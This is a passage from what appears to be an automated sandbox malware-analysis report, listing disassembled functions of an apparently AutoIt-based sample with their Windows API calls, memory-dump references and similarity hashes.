                                                                                                                                                                  • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                                                                                  • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                                                                                  Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2880819207-0
                                                                                                                                                                  • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                                  • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                                                                                  • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                                                                                  • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                                                                                  Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                                                                                  • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                                                                                  • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 357397906-0
                                                                                                                                                                  • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                                  • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                                                                                  • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                                                                                  • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                                                                                  Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeleteDestroyObject$IconWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3349847261-0
                                                                                                                                                                  • Opcode ID: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                                                                  • Instruction ID: b40ecd1d224a0eee13877c21127d2214a34fa415f2bf64fab3c1d23e87691ec4
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c154be5abaa40db753a7e31a7690d619ba9064fd0fbdb090dba25900d6c1ce3
                                                                                                                                                                  • Instruction Fuzzy Hash: 60F03C74200601DBC720EF66EDD892B77ACEF49762B00452AFD01D7256D738DC49CB69
                                                                                                                                                                  Function 0044B5E8 Relevance: 6.0, APIs: 4, Instructions: 37COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 0044B5F5
                                                                                                                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 0044B603
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B61A
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 0044B62C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$Leave$EnterExchangeInterlocked
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2223660684-0
                                                                                                                                                                  • Opcode ID: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                                  • Instruction ID: 403f3527bf09fa8cde02bf077099102ce48e3ba47acdf7e4c6f4aa39df9fcef1
                                                                                                                                                                  • Opcode Fuzzy Hash: f874c154f8023f3ba0c2945d1949571bb5db8163ed48ea6956c7f1527a392a8b
                                                                                                                                                                  • Instruction Fuzzy Hash: 78F05E36241104AF96145F59FD488EBB3ACEBE96317005A3FE5418361087A6E845CBB5
                                                                                                                                                                  Function 004472F1 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                  • MoveToEx.GDI32(?,?,?,00000000), ref: 00447317
                                                                                                                                                                  • LineTo.GDI32(?,?,?), ref: 00447326
                                                                                                                                                                  • EndPath.GDI32(?), ref: 00447336
                                                                                                                                                                  • StrokePath.GDI32(?), ref: 00447344
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2783949968-0
                                                                                                                                                                  • Opcode ID: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                                  • Instruction ID: af9b10de2b5e1f20f757a647655db97b0f5a8bbb123370319d9b3a4020b10ea9
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ed419099ee229fcfe9d8e0d6407f17218ff084d459cc4b150d2894610f6bb04
                                                                                                                                                                  • Instruction Fuzzy Hash: EBF06770105258BBE721AF54ED4EFAF3B9CAB06310F108119FE01622D1C7B86A02CBA9
                                                                                                                                                                  Function 0043646A Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                                                                  • AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2710830443-0
                                                                                                                                                                  • Opcode ID: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                                  • Instruction ID: 8dfc3faa83ebd232c18032ab1719f084f6ac8c8028b438e2b3a9de4cfe148046
                                                                                                                                                                  • Opcode Fuzzy Hash: 1738b650cb43453f600e53b83a6833ccb1a076b1e6f33d9371cddf7c9876f8ab
                                                                                                                                                                  • Instruction Fuzzy Hash: 61F06D7168470477EB209BA09D0EFDF379CAB18B11F10C41ABB04BA0C0C6F8B50087AD
                                                                                                                                                                  Function 00436C2B Relevance: 6.0, APIs: 4, Instructions: 29synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00436C38
                                                                                                                                                                  • UnloadUserProfile.USERENV(?,?,?,000000FF), ref: 00436C46
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C56
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,000000FF), ref: 00436C5B
                                                                                                                                                                    • Part of subcall function 00436BA9: GetProcessHeap.KERNEL32(00000000,?), ref: 00436BB6
                                                                                                                                                                    • Part of subcall function 00436BA9: HeapFree.KERNEL32(00000000), ref: 00436BBD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 146765662-0
                                                                                                                                                                  • Opcode ID: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                  • Instruction ID: 8fc8aea04bb3fa9100768a89291620bc24087d812574934f99790ad9b639e1d9
                                                                                                                                                                  • Opcode Fuzzy Hash: b977b2fe1054b7dcb1d3ac6099765c2a2cefd6419b68de81ef4d64d3a5db7b42
                                                                                                                                                                  • Instruction Fuzzy Hash: D9E0C97A510215ABC720EBA6DC48C5BB7ACEF99330311892EFD9683750DA74F840CFA4
                                                                                                                                                                  Function 00472B63 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00472B63
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00472B6C
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00472B78
                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00472B99
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                  • Opcode ID: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                                                  • Instruction ID: 759e45c534ddacfdadb557a06d932f9b55f62470d77a370046d272fbe6975a9a
                                                                                                                                                                  • Opcode Fuzzy Hash: 25b4e9c05087b9933bd86976477b7eaa0c4512bf79646aedece74daf711fda7f
                                                                                                                                                                  • Instruction Fuzzy Hash: BFF03071900205AFDB00EFB5DA4DA5DB7F4FB44315B10887EFD05D7251EAB59900DB54
                                                                                                                                                                  Function 00472BB2 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 00472BB2
                                                                                                                                                                  • GetDC.USER32(00000000), ref: 00472BBB
                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,00000074), ref: 00472BC7
                                                                                                                                                                  • ReleaseDC.USER32(00000000,?), ref: 00472BE8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2889604237-0
                                                                                                                                                                  • Opcode ID: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                                  • Instruction ID: 439663e17c05eb9dd95bc161916493026628bcc8c78d0f5787bb5213a8e6c1b3
                                                                                                                                                                  • Opcode Fuzzy Hash: cc3434de2b8b5abc20458b04240aea2a6e15dc869db4e5eb232345cc1bf11604
                                                                                                                                                                  • Instruction Fuzzy Hash: FAF03075900205AFCB00EFB5DA8856DB7F4FB84315B10887EFD05D7250DB7999019B94
                                                                                                                                                                  Function 00467408 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 308COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                                                                  • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileName$OpenSave
                                                                                                                                                                  • String ID: X
                                                                                                                                                                  • API String ID: 3924019920-3081909835
                                                                                                                                                                  • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                                                                                                                  • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                                                                                  • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                                                                                                                  • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                                                                  Function 00460D41 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 277comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • OleSetContainedObject.OLE32(00000000,00000001), ref: 00460F3E
                                                                                                                                                                    • Part of subcall function 00445660: OleSetContainedObject.OLE32(?,00000000), ref: 004456DD
                                                                                                                                                                    • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                    • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                    • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$Copy$ContainedObject$ClearErrorLast
                                                                                                                                                                  • String ID: AutoIt3GUI$Container
                                                                                                                                                                  • API String ID: 2018493657-3941886329
                                                                                                                                                                  • Opcode ID: 67da897eda1dfbe266f24d2aa24b4355ac2418a89100cfef55a9b130a410f978
                                                                                                                                                                  • Instruction ID: 68a0a4eee7c61d0b7a6187be62517e39d581686f9474de6139c94a20f06104f0
                                                                                                                                                                  • Opcode Fuzzy Hash: 67da897eda1dfbe266f24d2aa24b4355ac2418a89100cfef55a9b130a410f978
                                                                                                                                                                  • Instruction Fuzzy Hash: 68A15D746006059FDB10DF69C881B6BB7E4FF88704F24896AEA09CB351EB75E841CB65
                                                                                                                                                                  Function 004542ED Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000001,?), ref: 004543C6
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,AU3_FreeVar), ref: 004543DF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                  • String ID: AU3_FreeVar
                                                                                                                                                                  • API String ID: 190572456-771828931
                                                                                                                                                                  • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                                                                                                                  • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
